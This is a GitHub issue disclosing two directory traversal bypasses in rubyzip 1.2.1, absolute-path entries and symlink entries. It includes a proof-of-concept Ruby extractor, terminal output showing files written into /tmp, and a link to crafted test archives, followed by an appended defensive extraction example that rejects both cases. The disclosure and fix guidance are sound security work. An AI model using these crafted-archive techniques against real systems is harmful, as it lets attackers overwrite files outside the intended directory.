Several directory traversal vulnerabilities · Issue #369 · rubyzip/rubyzip · GitHub

Several directory traversal vulnerabilities #369
Closed
@tuzovakaoff

Overview

This issue is similar to the already closed #315, but I found two ways to bypass that fix.

You can find the test files at https://github.com/tuzovakaoff/zip_path_traversal

Proof of concept:

rubyzip.rb

```ruby
# Proof of concept: extracts every entry using entry.name unchanged as the
# destination path, so an absolute name or a name beneath a symlink entry is
# written wherever it points. Usage: ruby rubyzip.rb <archive.zip>
require 'zip'
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
```

1. Files with absolute path

UnZip strips the absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> unzip absolutepath.zip
Archive:  absolutepath.zip
warning:  stripped absolute path spec from /tmp/
   creating: tmp/
warning:  stripped absolute path spec from /tmp/file.txt
  inflating: tmp/file.txt

> ls
absolutepath.zip	symlink.zip
rubyzip.rb		tmp

rubyzip extracts files with an absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ls /tmp
file.txt

2. Archive with symbolic link

UnZip extracts only the symbolic link

> unzip symlink.zip
Archive:  symlink.zip
    linking: path                    -> ../../../../../tmp
checkdir error:  path exists but is not directory
                 unable to process path/file.txt.
finishing deferred symbolic links:
  path                   -> ../../../../../tmp


> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:19 path -> ../../../../../tmp

rubyzip extracts the symbolic link and puts the file into the /tmp folder

> ruby rubyzip.rb symlink.zip 
Extracting path
Extracting path/file.txt

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:22 path -> ../../../../../tmp

>ls /tmp
file.txt

Vulnerable version and test environment

> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May  8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64

> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]

> gem list | grep zip
rubyzip (1.2.1)

> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016

> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]

> gem list | grep zip
rubyzip (1.2.1)
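The two bypasses above come down to one missing check: the extractor never confirms that the path it is about to write resolves inside the destination directory. The following is an added example, not code from the issue or from rubyzip, showing an extraction policy that refuses both entry shapes. It models archive entries with a constructed `Entry` struct (the `symlink` flag stands in for the archive's own entry type, which is what a real extractor must consult, never the state on disk); `safe_entry_path`, `extract_entries`, `demo` and `existing_symlink_check` are names chosen here, not rubyzip's API.

```ruby
require 'pathname'
require 'tmpdir'
require 'fileutils'

# Constructed stand-in for an archive entry (not rubyzip's Zip::Entry).
Entry = Struct.new(:name, :data, :symlink) do
  def directory?
    name.end_with?('/')
  end
end

# Returns the absolute path an entry may be written to, or nil if the entry
# must be skipped. dest_dir must already exist.
def safe_entry_path(dest_dir, entry_name)
  dest = File.realpath(dest_dir)
  return nil if Pathname.new(entry_name).absolute?           # case 1: "/tmp/file.txt"
  return nil if entry_name.split(%r{[\\/]}).include?('..')   # classic "../" traversal
  target = File.expand_path(entry_name, dest)
  return nil unless target == dest || target.start_with?(dest + '/')
  # Case 2: walk up to the deepest path component that already exists and
  # resolve it, so a symlink such as "path -> ../../../../../tmp" left by an
  # earlier entry is detected before anything is written beneath it.
  existing = File.dirname(target)
  existing = File.dirname(existing) until File.exist?(existing) || File.symlink?(existing)
  real = File.realpath(existing)
  return nil unless real == dest || real.start_with?(dest + '/')
  target
rescue Errno::ENOENT
  nil # dangling symlink in the parent chain (or missing dest): treat as unsafe
end

# Extracts entries into dest_dir and returns [written, skipped] entry names.
# Symlink entries are never materialised, which removes the vector entirely.
def extract_entries(dest_dir, entries)
  written = []
  skipped = []
  entries.each do |entry|
    path = entry.symlink ? nil : safe_entry_path(dest_dir, entry.name)
    if path.nil?
      skipped << entry.name
      next
    end
    if entry.directory?
      FileUtils.mkdir_p(path)
    else
      FileUtils.mkdir_p(File.dirname(path))
      File.write(path, entry.data || '')
    end
    written << entry.name
  end
  [written, skipped]
end

# Constructed entries mirroring the two archives from the report, run against
# a throwaway destination. Returns [written, skipped] for inspection.
def demo
  Dir.mktmpdir do |dest|
    entries = [
      Entry.new('/tmp/', nil, false),
      Entry.new('/tmp/file.txt', 'owned', false),
      Entry.new('path', '../../../../../tmp', true),
      Entry.new('path/file.txt', 'owned', false),
      Entry.new('ok/file.txt', 'fine', false)
    ]
    extract_entries(dest, entries)
  end
end

# Shows the on-disk check on its own: a symlink pointing outside dest already
# exists (created directly here, standing in for one an earlier extraction
# left behind), so an entry beneath it must be refused while a sibling is not.
def existing_symlink_check
  Dir.mktmpdir do |dest|
    Dir.mktmpdir do |outside|
      File.symlink(outside, File.join(dest, 'path'))
      ['path/file.txt', 'ok/file.txt'].map { |n| !safe_entry_path(dest, n).nil? }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  written, skipped = demo
  puts "written: #{written.inspect}"
  puts "skipped: #{skipped.inspect}"
end
```

Because the symlink entry `path` is skipped, the later `path/file.txt` lands in a real `path/` directory inside the destination rather than in `/tmp`; `existing_symlink_check` covers the remaining case where such a link is already present. Both checks belong in the extractor, keyed off the destination directory, not in the code that chooses the archive.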
